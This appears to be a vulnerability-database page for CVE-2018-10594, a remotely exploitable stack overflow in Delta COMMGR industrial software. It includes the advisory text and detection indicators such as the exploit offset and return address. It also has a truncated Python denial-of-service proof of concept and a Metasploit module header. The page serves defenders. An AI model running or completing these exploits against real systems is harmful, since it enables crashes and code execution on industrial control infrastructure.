CVE-2018-10594
published 2018-06-26CVE-2018-10594: Delta Industrial Automation COMMGR from Delta Electronics versions 1.08 and prior with accompanying PLC Simulators (DVPSimulator EH2, EH3, ES2, SE, SS2 and…
PriorityP179critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
68.96%
99.3th percentile
Delta Industrial Automation COMMGR from Delta Electronics versions 1.08 and prior with accompanying PLC Simulators (DVPSimulator EH2, EH3, ES2, SE, SS2 and AHSIM_5x0, AHSIM_5x1) utilize a fixed-length stack buffer where an unverified length value can be read from the network packets via a specific network port, causing the buffer to be overwritten. This may allow remote code execution, cause the application to crash, or result in a denial-of-service condition in the application server.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| deltaww | commgr | <= 1.08 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xeb\x27\x90\x90
- →Monitor for large (>4164 byte) TCP packets sent to port 502 targeting COMMGR.exe; the exploit uses an offset of 4164 bytes before the return address overwrite. ↗
- →Detect the p/p/r ROP gadget return address 0x00401e14 from COMMGR.exe appearing in network payloads sent to port 502. ↗
- →Detect the short-jump NOP sled byte sequence \xeb\x27\x90\x90 in TCP payloads on port 502, indicative of the Metasploit exploit module for this CVE. ↗
- →The PoC DoS exploit connects repeatedly to port 80 and sends a buffer of 0x41*4412 followed by 0x42*1000; high-rate connection attempts with this pattern to port 80 on COMMGR hosts should be alerted on. ↗
- →Null byte (\x00) is the only bad character for the payload; shellcode in exploit traffic on port 502 will not contain null bytes, which can aid in distinguishing exploit attempts from benign traffic. ↗
- ·The Metasploit module targets only COMMGR 1.08 on Windows XP SP3, Windows 7 SP1, and Windows 8.1; the return address and offset are specific to this version/platform combination and will not apply to other versions. ↗
- ·The payload space is constrained to 640 bytes with NOP insertion disabled; detection rules should account for shellcode immediately following a 40-byte NOP sled. ↗
- ·The vulnerability is exploitable via a specific network port; both ports 502 and 10002 are referenced as the relevant communication ports for COMMGR and should both be monitored/restricted. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA ICS
Delta Electronics Delta Industrial Automation COMMGR
cisa_ics·2018-06-21·CVSS 9.8
[CRITICAL] Delta Electronics Delta Industrial Automation COMMGR
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
Delta Electronics Delta Industrial Automation COMMGR
Last RevisedJune 21, 2018
Alert CodeICSA-18-172-01
## 1. EXECUTIVE SUMMARY
-
CVSS v3 7.3
- ATTENTION: Exploitable remotely/low skill level to exploit
- Vendor: Delta Electronics
- Equipment: Delta Industrial Automation COMMGR
- Vulnerability: Stack-based Buffer Overflow
## 2. RISK EVALUATION
Successful exploitation of this vulnerability may allow remote code execution, cause the application to crash, or cause a denial-of-service condition in the application server.
## 3. TECHNICAL DETAILS
## 3.1 AFFECTED PRODUCTS
The
GHSA
GHSA-55m9-57p9-8j6r: Delta Industrial Automation COMMGR from Delta Electronics versions 1
ghsa_unreviewed·2022-05-13
CVE-2018-10594 [CRITICAL] CWE-119 GHSA-55m9-57p9-8j6r: Delta Industrial Automation COMMGR from Delta Electronics versions 1
Delta Industrial Automation COMMGR from Delta Electronics versions 1.08 and prior with accompanying PLC Simulators (DVPSimulator EH2, EH3, ES2, SE, SS2 and AHSIM_5x0, AHSIM_5x1) utilize a fixed-length stack buffer where an unverified length value can be read from the network packets via a specific network port, causing the buffer to be overwritten. This may allow remote code execution, cause the application to crash, or result in a denial-of-service condition in the application server.
No detection rules found.
Exploit-DB
Delta Electronics Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (Metasploit)
exploitdb·2018-10-09
CVE-2018-10594 Delta Electronics Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (Metasploit)
Delta Electronics Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
crafted packets. This module has been tested successfully on Delta Electronics Delta
Industrial Automation COMMGR 1.08 over
Windows XP SP3,
Windows 7 SP1, and
Windows 8.1.
},
'Author' =>
[
'ZDI', # Initial discovery
't4rkd3vilz', # PoC
'hubertwslin' # Metas
Exploit-DB
Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)
exploitdb·2018-07-02·CVSS 9.8
CVE-2018-10594 [CRITICAL] Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)
Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)
---
# Exploit Title: Delta Electronics Delta Industrial Automation COMMGR
- Remote STACK-BASED BUFFER OVERFLOW
# Date: 02.07.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.deltaww.com/
# Software Link: http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=2093&DocPath=1&hl=en-US
# Version:
COMMGR Version 1.08 and prior.
DVPSimulator EH2, EH3, ES2, SE, SS2
AHSIM_5x0, AHSIM_5x1
# Tested on: Kali Linux
# CVE : CVE-2018-10594
#Run exploit, result DOS
import socket
ip = raw_input("[+] IP to attack: ")
sarr = []
i = 0
while True:
try:
sarr.append(socket.create_connection((ip,80)))
print "[+] Connection %d" % i
crash1 = "\x41"*4412 +"\X42"*1000
sarr[i].send(crash1+'\r\n')
i
Metasploit
Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow
metasploit
Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow
Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow
This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially crafted packets. This module has been tested successfully on Delta Electronics Delta Industrial Automation COMMGR 1.08 over Windows XP SP3, Windows 7 SP1, and Windows 8.1.
No writeups or analysis indexed.
http://www.securityfocus.com/bid/104529https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01https://www.exploit-db.com/exploits/44965/https://www.exploit-db.com/exploits/45574/http://www.securityfocus.com/bid/104529https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01https://www.exploit-db.com/exploits/44965/https://www.exploit-db.com/exploits/45574/
2018-06-26
Published